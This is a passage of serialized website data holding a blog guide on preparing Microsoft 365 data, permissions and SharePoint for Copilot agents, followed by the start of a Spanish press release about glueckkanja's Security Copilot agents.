",[4328,17570,17571],{},"Everyone"," have read access to this? That shouldn’t be.” Implement a process where site admins certify permissions regularly.",[186,17574,17576],{"id":17575},"step-7-establish-ongoing-oversight","Step 7: Establish Ongoing Oversight",[12,17578,47],{},[12,17580,17581],{},"Put in place a continuous monitoring process for new oversharing issues. Oversharing control isn’t a one-time fix; as new sites, Teams, and files get created, you need to catch misconfigurations proactively. Consider using Microsoft Purview’s reports or alerts to catch things like files shared externally or to huge groups, new public teams created, etc. Microsoft’s tools can automate alerts for these conditions, so make use of them to maintain a strong posture.",[186,17583,17585],{"id":17584},"step-8-apply-sensitivity-labels-and-dlp-policies","Step 8: Apply Sensitivity Labels and DLP Policies",[12,17587,47],{},[12,17589,17590,17591,17594,17595,17598],{},"Use Microsoft Purview ",[251,17592,17593],{},"Sensitivity Labels"," to classify data (Confidential, Highly Confidential, etc.) and bind those labels to protection settings. For instance, a “Confidential” label can encrypt files or prevent external sharing. Also configure ",[251,17596,17597],{},"Data Loss Prevention (DLP)"," policies to prevent or monitor oversharing of sensitive info (like blocking someone from emailing a list of customer SSNs). These tools not only prevent accidental leaks in day-to-day use, they also work with Copilot: if Copilot tries to access or output labeled content in ways it shouldn’t, DLP can intervene. Moreover, Copilot itself will carry forward the document’s label to its responses, as noted later.",[186,17600,17602],{"id":17601},"step-9-implement-power-platform-governance","Step 9: Implement Power Platform Governance",[12,17604,47],{},[12,17606,17607],{},"Extend your oversight to the Power Platform (Power Apps, Power Automate, etc.). Define DLP policies for Power Platform to control connectors (so someone can’t, say, make a flow that pulls data from a sensitive SharePoint list and posts it to an external service). Also consider having multiple environments (Dev/Test/Prod) with proper security so that “Citizen Developers” building agents or apps don’t inadvertently expose data. Essentially, prevent the Power Platform from becoming an ungoverned backdoor to your data.",[186,17609,17611],{"id":17610},"step-10-educate-and-enable-your-agent-builders","Step 10: Educate and Enable Your Agent Builders",[12,17613,47],{},[12,17615,17616],{},"Finally, create guidelines and best practices for those who will be building or deploying AI agents (whether they are pro developers or business users). Establish training on handling data safely: e.g., how to choose appropriate knowledge sources for an agent, why not to include sensitive files in a broadly shared agent, how to test an agent’s output for any unexpected info. By fostering a data-aware culture among “agent makers,” you reduce the chance of someone inadvertently exposing information when designing an AI solution.",[12,17618,17619],{},[251,17620,17621],{},"Sources:",[1255,17623,17624,17630],{},[1258,17625,17626],{},[2630,17627,17628],{"href":17628,"rel":17629},"https://techcommunity.microsoft.com/blog/microsoft365copilotblog/from-oversharing-to-optimization-deploying-microsoft-365-copilot-with-confidence/4357963",[3135],[1258,17631,17632],{},[2630,17633,17634],{"href":17634,"rel":17635},"https://techcommunity.microsoft.com/blog/microsoft365copilotblog/microsoft-graph-connectors-update-expand-copilot%E2%80%99s-knowledge-with-50-million-ite/4243648",[3135],[12,17637,17638],{},"After you have completed these steps, you can now securely go on and start building productive agents. To build agents, we have different platforms and features from Microsoft that we can rely on for. You'll find the most prominent examples in the next chapter. If you need help with this list, feel free to reach out to us so we can help you with this important preparation exercise.",[12,17640,17641],{},"Nothing prevents you in the meanwhile to create PoC or Test-Agents with sample data, manually uploaded files or specific data attached via RAG. But we recommend these steps before a larger implementation / rollout of agents.",[41,17643,17645],{"id":17644},"understanding-differences-between-agent-platforms","Understanding differences between Agent Platforms",[12,17647,31],{},[186,17649,17651],{"id":17650},"step-1-understand-your-agent-creators","Step 1: Understand your Agent-Creators",[12,17653,47],{},[12,17655,17656,17657,17660],{},"After the foundation work to prepare the data, we need to understand which platforms are available to create those agents. We try to differentiate these tools by features and possibilities, but it's important to notice that creating agents and choosing the right tolling is a range. There are multiple ways to build AI agents in the Microsoft ecosystem. It’s important to pick the right one for your needs and your team’s skill level. It also clarifies when to leverage ",[251,17658,17659],{},"Azure AI Foundry"," versus built-in Copilot Studio tools.",[12,17662,17663],{},"Microsoft offers a set of different tools that can build agents by today. While they seem like each other, they are built for different target audiences and levels of expertise. Take a closer look at the overview below. Understanding who needs to create and maintain these agents, also shows us, which Knowledge sources (= data) we need to prepare for our Agents. Beside the tools in the list below, there are even more pro-code solutions to build agents like M365 Agents Toolkit, Visual Studio Code, Agent SDK and more.  All our data preparation  steps´ apply for them as well, since they access the same data like other agents do.",[12,17665,17666,540,17668],{},[251,17667,17438],{},[2630,17669,17670],{"href":17670,"rel":17671},"https://www.egroup-us.com/news/microsoft-copilot-ai-integration/",[3135],[17454,17673,420,17674,420,17677],{},[17457,17675],{"media":17459,"srcSet":17676},"https://res.cloudinary.com/c4a8/image/upload/v1756363984/blog/pics/table-copilot-ai-integration.png",[2772,17678],{"src":17676,"alt":17679},"Comparison of three Copilot solution categories: Pre-Built (ootb), Makers, and Developers.",[186,17681,17683],{"id":17682},"step-2-identify-use-cases-and-requirements-for-your-platform","Step 2: Identify Use Cases and requirements for your platform",[12,17685,47],{},[12,17687,17688],{},"As you can probably think of, not every platform supports every use case. Agents can be used for simple tasks, like answering questions based on existing knowledge or complex, like automatically generating answers or executing processes. Also, the final UX where and how we want to access those agents is important to decide for a platform.",[12,17690,17691],{},[2772,17692],{"alt":17693,"src":17694},"Diagram showing three levels of agent capabilities from simple to advanced","https://res.cloudinary.com/c4a8/image/upload/blog/pics/agents-differences.png",[12,17696,17697],{},"With these considerations in mind, we usually try to use the easiest solution possible to build our Agent. But also, we need to find the solution that is scalable for further development. But not every Agent needs to built on Agent AI Foundry from the very beginning.",[12,17699,17700],{},[251,17701,17702],{},"Tip:",[2109,17704,17705],{},[12,17706,17707],{},"If you are not sure where to start to build your Agent, you always can use Copilot Studio and either integrate more Data from Azure AI there and publish it to Microsoft 365 Copilot. So get both \"up- and downwards compatibility\".",[41,17709,17711],{"id":17710},"rag-retrieval-augumented-generation-vs-sharepoint-vs-upload","RAG (Retrieval-Augumented Generation) vs. SharePoint vs. Upload",[12,17713,31],{},[12,17715,17716,17717,17720],{},"Looking at it the first time, everything seems to be RAG – but there are differences! When you first explore Copilot Agents and its agent capabilities, it’s tempting to assume that all knowledge integration follows the same RAG (Retrieval-Augmented Generation) pattern. While they may all ",[4328,17718,17719],{},"look"," like RAG from the outside: retrieving documents and generating answers, the way they work under the hood differs significantly. Understanding these differences is essential for choosing the right approach based on your goals, scale, and technical readiness. Here is a short explanation and overview",[186,17722,17724],{"id":17723},"manual-file-uploads","Manual File Uploads",[12,17726,47],{},[12,17728,17729,17730,17733],{},"Manual upload is the simplest way to add knowledge to a Copilot agent. You drag and drop documents directly into the Copilot Studio interface. Microsoft automatically indexes these files and retrieves relevant content during a user query. This is ideal for small pilots and early testing. ",[251,17731,17732],{},"Also, be aware that the content of the files should be accessible to everyone with access to agent",". There is not Permission-Management here that you need to take care of. On the other hand, you will need to manually update these files in the long term if things change. Currently for Copilot Agents you can add up to 20 files manually.",[12,17735,17736,17737],{},"Source: ",[2630,17738,17741],{"href":17739,"rel":17740},"https://learn.microsoft.com/en-us/microsoft-365-copilot/extensibility/copilot-studio-agent-builder-knowledge",[3135],"https://learn.microsoft.com/en-us/microsoft-365-copilot/extensibility/copilot-studio-agent-builder-knowledge#file-size-limits",[186,17743,17745],{"id":17744},"sharepoint-online","SharePoint Online",[12,17747,47],{},[12,17749,17750],{},"This method uses Microsoft’s Retrieval API to access content directly from SharePoint Online connected via Graph Connector. The agent retrieves the most relevant content live at query time, respecting existing Microsoft 365 permissions. Content can be SharePoint sites, document libraries, folders or files. It’s dynamic, secure, and well-suited for scaling across departments or business units without managing your own infrastructure. Building up on the existing infrastructure, we are using the built-in security model from SharePoint with is a huge benefit compared to other knowledge options. Departments can easily update the files and that will be reflected within the agent. That means if two users with different access levels ask the agent, one might get an answer from a certain file while another user (without access) would not – which is exactly the behavior we want.",[12,17752,17753],{},"Note: SharePoint Lists are currently a not supported knowledge-type, so you can not index them out of the box (Q3 2025)",[186,17755,17757],{"id":17756},"custom-rag-self-managed","Custom RAG (Self-Managed)",[12,17759,47],{},[12,17761,17762],{},"In a classic RAG setup, you build and manage the entire retrieval pipeline yourself. That includes document preprocessing, chunking, embedding, storing in a vector database, and retrieving the top matches at query time. This gives you full control over how content is processed and retrieved, but it also brings complexity and maintenance overhead. It’s best suited for advanced use cases that require customization beyond what Microsoft’s managed services offer. This is not an in-built feature in Copilot or Copilot Studio; we would do this in Microsoft Azure.",[12,17764,17765],{},"A example when to use RAG could be for instance, If you needed to integrate an AI agent with a proprietary database or thousands of PDFs stored outside of Microsoft 365, and apply custom filters, a self-managed RAG might be necessary – but this requires significant effort.",[12,17767,17768,17769],{},"source: ",[2630,17770,17771],{"href":17771,"rel":17772},"https://learn.microsoft.com/en-us/azure/search/retrieval-augmented-generation-overview?tabs=docs",[3135],[186,17774,17776],{"id":17775},"what-to-choose-and-when","What to Choose and When",[12,17778,47],{},[12,17780,17781],{},"While all three approaches involve retrieving content to support language generation, only the custom self-managed solution qualifies as “true RAG” in the technical sense. For most organizations starting out, manual uploads or SharePoint connections are significantly easier and faster to implement. They provide strong results with minimal setup - and they let teams focus on use case design and adoption, rather than infrastructure.",[12,17783,17784],{},"A general advice from my side in this point:",[2109,17786,17787],{},[12,17788,17789],{},"Try to build the agents as close to your data as possible",[12,17791,17792],{},"Example: If your data is stored in large SQL databases or external CRM systems, a SharePoint Agent will not do the job. If we have all our knowledge in SharePoint, SharePoint Agents or Copilot Agents might be a good start.",[12,17794,17795],{},"Custom RAG should be considered only when your needs go beyond what the managed options can provide, not as the default starting point. A manual upload is great for the first pilot or for small pilots with limited and specific knowledge that is not often updated. In many scenarios we would just use a SharePoint library or site with the agent. Because of this, we are focusing on a scenario looking like that:",[41,17797,17799],{"id":17798},"microsoft-365-copilot-copilot-agents-security-compliance-out-of-the-box","Microsoft 365 Copilot & Copilot Agents: Security & Compliance out of the box",[12,17801,31],{},[12,17803,17804,17807],{},[251,17805,17806],{},"Secure cloud infrastructure"," is the bedrock for enterprise AI. Microsoft provides the most secure framework possible for our Agents by putting them in context of Microsoft 365 Copilot. Every organization can trust their existing Security Framework based on Conditional Access and Multi-Factor authentication for access and their existing Governance Framework based on Microsoft Purview.",[12,17809,17810],{},"Agents that are used in M365 Copilot or published from Copilot Studio as a Teams Chatbot are only accessible within our tenant boundaries. That means we get the same level of security for these applications that we already have.",[12,17812,17813],{},[2772,17814],{"alt":17815,"src":17816},"Diagram showing how Microsoft 365 Copilot accesses user data within Microsoft 365.","https://res.cloudinary.com/c4a8/image/upload/blog/pics/copilot-security.png",[12,17818,17819],{},"In addition to that, Microsoft offers several technical and organization commitments gathered as we call it \"Enterprise Grade Data Protection\".",[12,17821,17736,17822],{},[2630,17823,17441],{"href":17441,"rel":17824},[3135],[186,17826,17828],{"id":17827},"microsoft-365-copilot-enterprise-data-protection-edp-for-prompts-and-responses","Microsoft 365 Copilot: Enterprise Data Protection (EDP) for Prompts and Responses",[12,17830,47],{},[1255,17832,17833,17852,17858,17878,17884],{},[1258,17834,17835,17838,17839,4598,17842,17845,17846,4598,17849,1014],{},[251,17836,17837],{},"Contractual Protection",": Prompts (user input) and responses (Copilot output) are protected under the ",[251,17840,17841],{},"Data Protection Addendum (DPA)",[251,17843,17844],{},"Product Terms",". These protections are the same as those applied to ",[251,17847,17848],{},"emails in Exchange",[251,17850,17851],{},"files in SharePoint",[1258,17853,17854,17857],{},[251,17855,17856],{},"Data Security:"," Encryption at rest and in transit, Physical security controls, Tenant-level data isolation",[1258,17859,17860,17863,17864,17867,17868,805,17871,805,17874,17877],{},[251,17861,17862],{},"Privacy Commitments"," Microsoft acts as a ",[251,17865,17866],{},"data processor",", using data only as instructed by the customer. Supports ",[251,17869,17870],{},"GDPR",[251,17872,17873],{},"EU Data Boundary",[251,17875,17876],{},"ISO/IEC 27018",", and more.",[1258,17879,17880,17883],{},[251,17881,17882],{},"Access Control & Policy Inheritance",": Copilot respects: Identity models and permissions, Sensitivity labels, Retention policies, Audit settings, Admin configurations, AI & Copyright Risk Mitigation and Protection against: Prompt injection, Harmful content, Copyright issues (via protected material detection and Customer Copyright Commitment)",[1258,17885,17886,17889],{},[251,17887,17888],{},"No Model Training:"," Prompts, responses, and Microsoft Graph data are NOT used to train foundation models.",[186,17891,17893],{"id":17892},"copilot-agents-with-sharepoint-online-knowledge","Copilot Agent's with SharePoint Online-Knowledge:",[12,17895,47],{},[1255,17897,17898,17908],{},[1258,17899,17900,17903,17904,17907],{},[251,17901,17902],{},"Permission & Sharing Model:"," Agents with SharePoint Online access always respects the permissions of the associated SharePoint site. That means, ",[251,17905,17906],{},"on one hand, you need to ensure that everyone who should have access has at least read permissions on the site","; on the other hand, you must be vigilant about not granting unnecessary permissions that could expose sensitive information to unauthorized users**. Properly configuring permissions is essentia**l, as Copilot Agents will only be able to access and surface content that the querying user is permitted to see. Additionally, leveraging Microsoft Purview information protection ensures that sensitivity labels and data loss prevention (DLP) policies persist with the content",[1258,17909,17910,17913,17914,17917],{},[251,17911,17912],{},"Persistent Labels & DLP:"," Enable ",[251,17915,17916],{},"Microsoft Purview"," information protection so that sensitivity labels persist with content. Copilot agents inherit labels on source documents. Meaning if a file is classified “Confidential,” any AI-generated content or document from now on, will carry that label forward. This persistent label inheritance works in tandem with Data Loss Prevention policies to prevent AI from inadvertently exposing protected data. In practice, that means even if Copilot summarizes a sensitive file, the summary will be handled as sensitive too. This is something outstanding we do not find outside of Microsoft 365 and we won't see any AI Agent that is able to deeply integrate like this in the Microsoft 365 ecosystem!",[41,17919,17921],{"id":17920},"best-practices-to-prepare-further-sharepoint-online-for-agent-use","Best Practices to prepare further SharePoint Online for Agent use",[12,17923,31],{},[12,17925,17926],{},"To prepare SharePoint Online for effective use with Copilot Agents, follow these best practices:",[186,17928,17930],{"id":17929},"dedicated-sharepoint-site","Dedicated SharePoint Site",[12,17932,47],{},[12,17934,17935],{},"First, create a dedicated SharePoint site or a specific folder designed exclusively for your Copilot Agent’s knowledge base. This approach helps minimize issues related to oversharing and reduces the risk of users accidentally uploading sensitive or irrelevant files to the agent’s accessible repository. If you decide to use an existing SharePoint site, carefully review its contents to ensure that no confidential or sensitive information is stored there that should not be discoverable by the agent.",[186,17937,17939],{"id":17938},"granting-access","Granting Access",[12,17941,47],{},[12,17943,17944,17945,17948],{},"It is also important to ensure that all intended users have the necessary read permissions to access the site or folder. If you need to grant access manually, Ensure all intended users have read access to the site (for example, by ",[251,17946,17947],{},"adding them to the SharePoint site’s Visitors group"," or an appropriate Azure AD security group) to simplify the process and prevent accidental permission misconfigurations.",[186,17950,17952],{"id":17951},"prepare-files","Prepare Files",[12,17954,47],{},[12,17956,17957,17958,17961,17962,17965],{},"When preparing documents for use with Copilot Agents, remember that the AI currently ",[251,17959,17960],{},"cannot interpret embedded images within"," files. ",[251,17963,17964],{},"Therefore, add descriptive image captions or alternative text"," to help ensure that important visual information is not lost. For text-heavy documents, make sure When summarizing or referencing content, keep the total to a maximum of 1.5 million words or 300 pages to ensure Copilot works effectively.",[12,17967,17968,17969,17972],{},"For ",[251,17970,17971],{},"Excel files",", organize your data so that each file focuses either on numbers or on text, as mixed-content tables tend to yield less accurate results. Agents also respond most reliably to queries when the relevant data is contained within a single sheet of the workbook.",[12,17974,17975],{},[4328,17976,17977],{},"Agents respond best to Excel data when it’s contained in one sheet.",[12,17979,17980],{},"Example: If you have a large customer feedback survey stored in a single Excel file, separate the quantitative data (such as ratings and numerical responses) from the qualitative data (such as free-text feedback) into two different sheets. This method allows you to use tools like Python and Excel formulas to efficiently analyze the numerical data (e.g., calculate averages, sort results, determine confidence levels), while leveraging M365 Copilot’s sentiment analysis features to gain insights from the text-based feedback.",[186,17982,17984],{"id":17983},"file-limitations","File Limitations",[12,17986,47],{},[12,17988,17989,17990],{},"Finally, be aware of the file types and size limitations supported by Copilot Agents and Copilot Studio. The following table outlines current support:",[2630,17991,17741],{"href":17739,"rel":17992},[3135],[12,17994,17995,17996],{},"Also acknowledge those best practices Microsoft has shared on document lengths: ",[2630,17997,17998],{"href":17998,"rel":17999},"https://support.microsoft.com/en-gb/topic/keep-it-short-and-sweet-a-guide-on-the-length-of-documents-that-you-provide-to-copilot-66de2ffd-deb2-4f0c-8984-098316104389",[3135],[18001,18002],"v-table",{":head":7656,":hide-container":7656,":table":18003},"fileLimitations",[12,18005,18006],{},"Currently unsupported Filetypes in SharePoint Online: Officially everything else that is not listed there, is not officially supported.",[12,18008,18009],{},"Certain file types, such as CSV files, may function adequately even though they are not officially supported because they closely resemble plain text formats. However, most other file types—particularly container files like CAB, EXE, ZIP, as well as image, video, and audio formats such as PNG, IMG, MP3, and MP4—are not supported at this time.",[41,18011,18013],{"id":18012},"final-thoughts","Final thoughts",[12,18015,31],{},[12,18017,18018],{},"By following these recommendations, you can ensure that your Copilot Agents have access to well-structured, secure, and high-quality data, maximizing their usefulness and minimizing the risk of accidental data exposure. Investing time in preparing your SharePoint environment sets a strong foundation for successful AI agent deployment and adoption within your organization.",[12,18020,18021],{},"In fact many of our \"Build-an-Agent\" projects starting exactly with that. Not building the agent, but preparing the infrastructure and knowledge that we have a good quality data to use for the AI, because the Agent is only as good as the system beneath it!",[41,18023,18025],{"id":18024},"want-to-learn-more","Want to learn more?",[12,18027,31],{},[12,18029,18030],{},"Join our webcast to learn how to prepare your M365 environment for Copilot Agents from infrastructure and data governance to platform decisions.",[52,18032,18036],{"className":18033},[18034,3053,18035,3055],"cta-list__item","mr-3",[2630,18037,18041],{"role":3058,"className":18038,"dataText":18039,"href":18040,"type":3068,"ctatext":18039,"ctahref":18040,"ctatype":3068},[3060,3061,3062,3063,3064,3065],"Read the full article","/blog/corporate/2025/03/mssp-2025-en",[102,18042,18044],{"className":18043},[3072],"Register now",{"title":65,"searchDepth":111,"depth":111,"links":18046},[18047,18048,18049,18062,18066,18072,18076,18082,18083],{"id":4574,"depth":111,"text":4575},{"id":17397,"depth":111,"text":17398},{"id":17473,"depth":111,"text":17474,"children":18050},[18051,18052,18053,18054,18056,18057,18058,18059,18060,18061],{"id":17482,"depth":329,"text":17483},{"id":17491,"depth":329,"text":17492},{"id":17504,"depth":329,"text":17505},{"id":17521,"depth":329,"text":18055},"Step 4: Generate a SharePoint Online Baseline Report",{"id":17553,"depth":329,"text":17554},{"id":17562,"depth":329,"text":17563},{"id":17575,"depth":329,"text":17576},{"id":17584,"depth":329,"text":17585},{"id":17601,"depth":329,"text":17602},{"id":17610,"depth":329,"text":17611},{"id":17644,"depth":111,"text":17645,"children":18063},[18064,18065],{"id":17650,"depth":329,"text":17651},{"id":17682,"depth":329,"text":17683},{"id":17710,"depth":111,"text":17711,"children":18067},[18068,18069,18070,18071],{"id":17723,"depth":329,"text":17724},{"id":17744,"depth":329,"text":17745},{"id":17756,"depth":329,"text":17757},{"id":17775,"depth":329,"text":17776},{"id":17798,"depth":111,"text":17799,"children":18073},[18074,18075],{"id":17827,"depth":329,"text":17828},{"id":17892,"depth":329,"text":17893},{"id":17920,"depth":111,"text":17921,"children":18077},[18078,18079,18080,18081],{"id":17929,"depth":329,"text":17930},{"id":17938,"depth":329,"text":17939},{"id":17951,"depth":329,"text":17952},{"id":17983,"depth":329,"text":17984},{"id":18012,"depth":111,"text":18013},{"id":18024,"depth":111,"text":18025},{"lang":2170,"seoTitle":18085,"titleClass":2172,"date":18086,"categories":18087,"blogtitlepic":18089,"socialimg":18090,"customExcerpt":18091,"keywords":18092,"maxContent":2180,"fileLimitations":18093,"asideNav":18119,"hreflang":18139,"footer":18144,"scripts":18145,"published":2180},"How to Prepare Your M365 Data for Copilot Agents","2025-08-28",[18088],"Workplace","head-microsoft-copilot.jpg","/blog/heads/head-microsoft-copilot.jpg","Before Microsoft 365 Copilot Agents can deliver real value, the foundation must be solid: clean data, proper permissions, and a reliable infrastructure. This guide explains why data quality determines AI success, highlights risks like oversharing and silos, and outlines 10 practical steps to make your M365 environment agent-ready—secure, compliant, and scalable.","Microsoft 365 Copilot, Copilot Agents, M365 data governance, AI readiness, SharePoint data security, M365 infrastructure, oversharing prevention, AI data preparation, Microsoft 365 security, agent-ready M365",[18094,18098,18102,18105,18108,18110,18112,18114,18115,18117],[18095,18096,18097],"File type","SharePoint Online - Limit","Manual Upload - Limit",[18099,18100,18101],".doc","150 MB","100 MB",[18103,18104,18101],".docx","512 MB",[18106,18100,18107],".html","not supported",[18109,18104,18101],".pdf",[18111,18100,18101],".ppt",[18113,18104,18101],".pptx",[11633,18100,18101],[18116,18100,18101],".xls",[18118,18100,18101],".xlsx",{"menuItems":18120},[18121,18124,18127,18130,18133,18136],{"href":18122,"text":18123},"#why-your-infrastructure-data-matters","Why Infrastructure Matters",{"href":18125,"text":18126},"#_10-steps-to-improve-your-m365-data-infrastructure-now","10 Steps for M365 Data",{"href":18128,"text":18129},"#understanding-differences-between-agent-platforms","Understanding Agent Platform",{"href":18131,"text":18132},"#rag-retrieval-augumented-generation-vs-sharepoint-vs-upload","RAG vs. SharePoint vs. Upload",{"href":18134,"text":18135},"#microsoft-365-copilot-copilot-agents-security-compliance-out-of-the-box","M365 Copilot: Security",{"href":18137,"text":18138},"#best-practices-to-prepare-further-sharepoint-online-for-agent-use","SharePoint Best Practices",[18140,18142],{"lang":2260,"href":18141},"/de/posts/2025-08-26-agent-ready-infrastructure",{"lang":2170,"href":18143},"/es/posts/2025-08-26-agent-ready-infrastructure",{"noMargin":2180},{"slick":2180},"/posts/2025-08-28-agent-ready-infrastructure",{"title":17374,"description":65},"posts/2025-08-28-agent-ready-infrastructure",[18150,18151,18152,18153],"Microsoft 365 Copilot","M365 Data Governance","SharePoint Security","AI Data Preparation","2hdg_i1twgpYMpOuTEHoxUh3A2EPPpla-Ksx4Jk0VXU",{"id":18156,"title":18157,"author":18158,"body":18159,"cta":2165,"description":65,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":18266,"moment":2165,"navigation":2180,"path":18311,"seo":18312,"stem":18313,"tags":18314,"webcast":2167,"__hash__":18318},"content_es/posts/2025-09-30-security-store.md","Entre los primeros a nivel mundial: glueckkanja Security Copilot Agents",[2460],{"type":9,"value":18160,"toc":18261},[18161,18165,18167,18170,18172,18175,18178,18181,18184,18188,18195,18199,18209,18220,18243,18254],[41,18162,18164],{"id":18163},"en-el-lanzamiento-de-microsoft-security-store-glueckkanja-presentó-10-security-copilot-agents","En el lanzamiento de Microsoft Security Store, glueckkanja presentó 10 Security Copilot Agents",[12,18166,31],{},[12,18168,18169],{},"Offenbach, Alemania – 30 de septiembre de 2025 – glueckkanja anuncia hoy su incorporación al ecosistema de partners de Microsoft Security Store. Como uno de los primeros partners seleccionados, glueckkanja destaca por su experiencia probada en tecnologías de seguridad de Microsoft, su espíritu innovador y su estrecha colaboración con Microsoft.",[2688,18171],{":quotes":2688,":no-fullscreen":7656},[52,18173],{"style":18174},"padding-top:50px;",[12,18176,18177],{},"Trabajamos mano a mano con Microsoft para dar forma al desarrollo del Microsoft Security Store, aportando feedback sobre nuevas funcionalidades, integraciones y necesidades reales de los clientes. Publicando soluciones certificadas y agentes de IA que se integran perfectamente con los productos de Microsoft Security, te lo ponemos fácil para descubrir, comprar e implementar tecnologías de seguridad de confianza. A través del Security Store, te ayudamos a acelerar tus resultados de seguridad y simplificar las operaciones con soluciones validadas, fáciles de desplegar y diseñadas para funcionar en conjunto.",[12,18179,18180],{},"El Microsoft Security Store simplifica cómo puedes descubrir, comprar e implementar soluciones y agentes de IA de confianza. Con integraciones certificadas, facturación sencilla y despliegue rápido, el Security Store te ayuda a reforzar tu postura de seguridad y centrarte en lo que realmente importa.",[12,18182,18183],{},"El Microsoft Security Store marca un nuevo estándar en la adquisición y operación de soluciones de ciberseguridad. Centralizando una amplia gama de soluciones y agentes de IA, ahora puedes descubrir, adquirir y poner en marcha tecnologías avanzadas de seguridad de forma mucho más ágil. Funcionalidades como el alineamiento con frameworks del sector, la facturación simplificada y el despliegue guiado ayudan a tu equipo de seguridad a reducir la complejidad, acelerar la innovación y sacar el máximo partido a tu inversión en seguridad.",[41,18185,18187],{"id":18186},"más-información-en-el-blog-oficial-de-microsoft","Más información en el blog oficial de Microsoft:",[12,18189,18190],{},[2630,18191,18194],{"href":18192,"rel":18193},"https://techcommunity.microsoft.com/blog/securitycopilotblog/agentic-security-your-way-build-your-own-security-copilot-agents/4454555",[3135],"Agentic Security Your Way: Build Your Own Security Copilot Agents",[41,18196,18198],{"id":18197},"sobre-glueckkanja","Sobre glueckkanja",[12,18200,18201,18204,18205,18208],{},[251,18202,18203],{},"Gestionamos y protegemos ecosistemas Microsoft a gran escala","\nglueckkanja es uno de los principales proveedores de servicios gestionados en la nube y partner destacado de Microsoft, ofreciendo entornos Microsoft totalmente ",[251,18206,18207],{},"cloud-native",", seguros y escalables. Con un enfoque de blueprint unificado y metodología Infrastructure-as-Code, ayudamos a empresas a acelerar su transformación digital y adopción cloud: seguro, consistente y a escala.",[12,18210,18211,18212,18215,18216,18219],{},"Ofrecemos servicios gestionados integrales para ",[251,18213,18214],{},"Microsoft Azure, Microsoft Entra y Microsoft Intune",", ayudándote a optimizar la gestión de identidades y accesos, modernizar la administración de endpoints y construir infraestructuras Zero Trust conformes. Todo esto se complementa con ",[251,18217,18218],{},"operaciones de seguridad 24/7"," y respuesta ante incidentes desde nuestro propio Cybersecurity Operations Center (SOC), asegurando protección continua, reacción rápida y cumplimiento con los estándares más actuales.",[12,18221,18222,18223,18226,18227,18230,18231,18234,18235,18238,18239,18242],{},"Para una experiencia Microsoft realmente cloud-native, hemos desarrollado nuestras propias herramientas que simplifican la gestión y automatizan procesos: ",[251,18224,18225],{},"KONNEKT"," para colaboración segura con datos de Microsoft 365, ",[251,18228,18229],{},"RADIUSaaS"," y ",[251,18232,18233],{},"SCEPman"," para autenticación de red sin contraseñas integrada en Intune, ",[251,18236,18237],{},"RealmJoin"," para distribución de software a escala y ",[251,18240,18241],{},"TerraProvider"," para el aprovisionamiento totalmente automatizado de CloudPCs y dispositivos físicos vía Intune.",[12,18244,18245,18246,18249,18250,18253],{},"Fuimos de los primeros partners a nivel mundial en obtener la certificación ",[251,18247,18248],{},"Microsoft Verified MXDR",", prueba de nuestra excelencia en operaciones de seguridad gestionada. Con cerca de 250 profesionales cloud y una trayectoria de éxito, hemos sido reconocidos varias veces como Microsoft Worldwide Partner of the Year y estamos en el top del cuadrante ",[251,18251,18252],{},"ISG Microsoft 365"," en Alemania desde 2019.",[12,18255,18256,18257,18260],{},"Además, glueckkanja está entre las TOP 100 empresas más innovadoras de Alemania y nuestra ",[251,18258,18259],{},"excelente puntuación de 4,7/5 en Kununu"," (la principal plataforma de valoración de empleadores en Alemania) subraya nuestra cultura de excelencia y satisfacción del equipo.",{"title":65,"searchDepth":111,"depth":111,"links":18262},[18263,18264,18265],{"id":18163,"depth":111,"text":18164},{"id":18186,"depth":111,"text":18187},{"id":18197,"depth":111,"text":18198},{"lang":2170,"seoTitle":18267,"titleClass":2172,"date":18268,"categories":18269,"blogtitlepic":18271,"socialimg":18272,"customExcerpt":18273,"keywords":18274,"maxContent":2167,"hreflang":18275,"quotes":18280,"contactInContent":18286,"footer":18309,"scripts":18310,"published":2180},"glueckkanja es socio de lanzamiento en Microsoft Security Store con 10 Security Copilot Agents","2025-09-30",[18270],"Seguridad","head-security-agents.jpg","/blog/heads/head-security-agents.jpg","glueckkanja es uno de los primeros partners en el Microsoft Security Store Preview y lanza 10 Security Copilot Agents nativos de Microsoft para Security, Entra, Intune y Purview. Desarrollados en estrecha colaboración con clientes, estos agentes están pensados desde el primer día para los retos reales de la seguridad: totalmente integrados, listos para empresas y hechos para simplificar y acelerar tus operaciones de seguridad.","Microsoft Security Store Preview, Security Copilot Agents, glueckkanja partner de Microsoft, soluciones de seguridad nativas de Microsoft, herramientas de ciberseguridad con IA, agentes de seguridad Entra, automatización de seguridad Intune, agentes de cumplimiento Purview, seguridad cloud Microsoft Copilot, simplificar operaciones de Microsoft Security",[18276,18278],{"lang":2260,"href":18277},"/de/posts/2025-09-30-security-store",{"lang":2257,"href":18279},"/en/posts/2025-09-30-security-store",{"items":18281},[18282],{"text":18283,"name":18284,"position":18285,"company":2720},"Un Forensic Agent de glueckkanja AG permite un análisis en profundidad de los incidentes de Defender XDR y acelera así las investigaciones. Al mismo tiempo, el Privileged Admin Watchdog Agent ayuda a aplicar el principio de Zero Standing Privilege eliminando identidades administrativas permanentes. Junto con otros seis agentes en el Security Store, glueckkanja AG demuestra cómo las organizaciones pueden afrontar eficazmente una amplia gama de retos de seguridad y TI.","Dorothy Li","Corporate Vice President, Security Copilot, Ecosystem and Marketplace",{"quote":2180,"infos":18287},{"bgColor":2200,"headline":18288,"subline":18289,"level":41,"textStyling":2203,"flush":2204,"person":18290,"form":18292},"Contáctanos","¿Quieres saber cómo nuestros 10 agentes de Security Copilot, nativos de Microsoft, simplifican tus operaciones en Security, Entra, Intune y Purview? Completa el formulario y te compartiremos información, demostraciones y ejemplos prácticos adaptados a tus necesidades.",{"image":2206,"cloudinary":2180,"alt":2207,"name":2208,"quotee":2208,"quoteeTitle":2209,"quote":18291},"Lo que nuestros clientes ganan con nosotros es tiempo y claridad: los equipos de seguridad dedican menos esfuerzo al análisis manual y la resolución de incidencias, y pueden centrarse en las amenazas que realmente importan. Con nuestros 10 agentes de Security Copilot, te ayudamos a reforzar tu seguridad, reducir costes y simplificar el día a día directamente en Microsoft Security.",{"ctaText":2212,"cta":18293,"method":2168,"action":2215,"fields":18294},{"skin":2214},[18295,18296,18297,18298,18300,18302,18303,18304,18306,18307,18308],{"label":2218,"type":61,"id":2219,"required":2180,"requiredMsg":4181},{"label":2222,"type":61,"id":2223,"required":2180,"requiredMsg":4183},{"label":2829,"type":2227,"id":2227,"required":2180,"requiredMsg":4186},{"label":18299,"type":2231,"id":2232,"required":2167,"requiredMsg":4428},"Tu mensaje para 